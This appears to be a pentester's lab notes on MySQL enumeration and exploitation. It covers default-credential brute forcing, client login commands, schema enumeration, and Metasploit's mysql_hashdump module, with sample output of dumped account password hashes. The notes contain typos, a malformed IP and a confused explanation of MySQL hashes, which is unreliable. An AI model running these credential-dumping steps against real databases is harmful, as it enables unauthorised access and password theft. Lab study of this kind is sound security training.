# Mysql ###### tags: `service` Database type -> RDBMS (relation database management systems) **Notice**: Attempting to brute-force default account passwords if we really don't have any other information Normal way is get the username and password from the web. using that to access the mysql service (finding credentials from the configuration file) # Enumerate ## requirement you have to installed the Mysql client end to access remote Mysql server ## Users https://www.exploit-db.com/exploits/23081 https://nmap.org/nsedoc/scripts/mysql-enum.html --- ## Version ``` sudo apt install default-mysql-client ``` login command ``` mysql -h \[IP\] -u \[username\] -p ```` ``` mysql -h 1183.201 -u root -p ```   ## Using Matasploit "Mysql_sql" module username: root password: password execute slq command -> select version()  # Exploiting Mysql ## schema ``` database <--> schema ``` Create database 123 == Create schema 123 -> information_schema ``` select table_name from tables ``` user table  ## Hashs In MySQL hashes can be used in different ways, for instance to index data into a hash table. Each hash has a unique ID that serves as a pointer to the original data. ### Metasploit ``` mysql_schemadump ``` ``` mysql_hashdump ``` ``` [+] 10.10.234.86:3306 - Saving HashString as Loot: root: [+] 10.10.234.86:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE [+] 10.10.234.86:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE [+] 10.10.234.86:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E [+] 10.10.234.86:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 [+] 10.10.234.86:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18 [*] 10.10.234.86:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` Identify the hash types